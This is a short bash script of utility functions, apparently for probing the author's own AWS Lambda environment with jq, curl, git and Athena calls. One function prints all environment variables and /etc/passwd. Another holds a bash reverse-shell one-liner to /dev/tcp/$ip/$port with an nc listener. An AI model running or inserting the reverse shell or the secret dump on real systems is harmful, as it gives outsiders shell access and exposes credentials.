#!/usr/bin/env bash
set -eou pipefail

aws_works(){
  echo 'aws works'
  #aws s3 cp s3://skilbjo-data/datalake/markets-etl/currency/s3uploaddate=2018-02-03/file.csv /tmp/
  #cat /tmp/file.csv
}

fn(){
  echo 'Im in a fn'
}

cpu_info(){
  env_vars=$(env)
  user=$(whoami)
  kernel=$(uname -a)
  distro=$(cat /etc/*-release)
  cores=$(getconf _NPROCESSORS_ONLN 2>/dev/null || getconf NPROCESSORS_ONLN 2>/dev/null || echo 1)

  echo "env vars are: $env_vars"
  echo "user is $user"
  echo "kernel is $kernel"
  echo "distro is $distro"
  echo "number of cores is: $cores"

  echo '/etc/passwd is:'
  cat /etc/passwd
}

_jq_example(){
  echo 'gonna try jq'
  echo '{"hi": 1}' | jq .

  # seems like the aws call needs -k. the home version doesn't
  curl -k https://skilbjo-aws.duckdns.org/api/currency/latest | jq .
}

_jsonlint_example(){
  echo 'gonna try jsonlint'
  echo '{"hi": 1}' | jsonlint

  echo 'curl'
  curl https://skilbjo.duckdns.org/api/currency/latest | jsonlint
}

_query_athena_example(){
  query "select 1+1 as hello_athena"
}

_git_example(){
  git clone https://github.com/skilbjo/markets-etl.git

  ls markets-etl
}

_reverse_shell(){
  # run this in lambda
  bash -i >& /dev/tcp/$ip/$port 0>&1

  # run this locally
  # nc -l -p $port -vvv
}
